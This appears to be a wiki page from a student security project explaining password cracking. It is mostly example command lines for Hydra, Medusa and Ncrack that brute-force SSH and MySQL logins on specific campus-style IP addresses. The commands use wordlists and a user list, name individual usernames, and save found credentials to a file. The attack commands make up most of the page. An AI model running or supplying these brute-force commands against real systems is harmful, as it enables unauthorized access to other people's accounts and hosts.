Wiki
Clone wikipig / PasswordCracking
Password Cracking
Password cracking is one of the most basic types of attacks. Password cracking is (very broadly) divided into two categories. The first is hash cracking, where a hashed version of a password is obtained through network monitoring, retrieving an encrypted password file, etc., and a tool is then used to break the hash. Common tools for this depend on the situation, but include: Aircrack, for WEP/WPA passwords; John the Ripper, for Unix passwords; and Cain and Abel, for Windows passwords. The second, and the type this project is concerned with, is brute-force remote authentication attacks.
TOOLS USED
THC-Hydra
Example Attack
# Attempting to crack John Doe (jdoe) on ssh with Roget's wordlist
hydra -ljdoe -P passwd_lists/Roget.words 137.22.73.129 ssh
# Try cracking on all the .73 hosts we have running, checking extra stuff
# for passwords, showing all combos, and writing success to file
hydra -L carletonusers.txt -P passwd_lists/Unabr.dict -M hosts.txt -e ns -v
-o valid_credentials.txt
Medusa
Example Attack
# Attempting to crack jdoe on ssh with Roget's wordlist
medusa -ujdoe -P passwd_lists/Roget.words -h137.22.73.131 -Mssh
# Attempting to crack me on mysql with englex-dict, using ssl
medusa -ugriffisd -P passwd_lists/englex-dict -h137.22.73.131 -s -Mmysql
Ncrack
Example Attack
# Run on SSH with input username and password list, prioritizing to
# username:allpasswords, not allusernames:password
ncrack -U carletonusers.txt -P passwd_lists/Unabr.dict --passwords-first
137.22.73.130 -p22
# Run, very carefully, using built-in lists on SSH
ncrack -T paranoid 137.22.73.132 -p22
# Hammer the ever-loving shit out of one pre-determined user
ncrack --user christjo -T insane 137.22.73.132 -p22
ATTACK PROFILE
????
Updated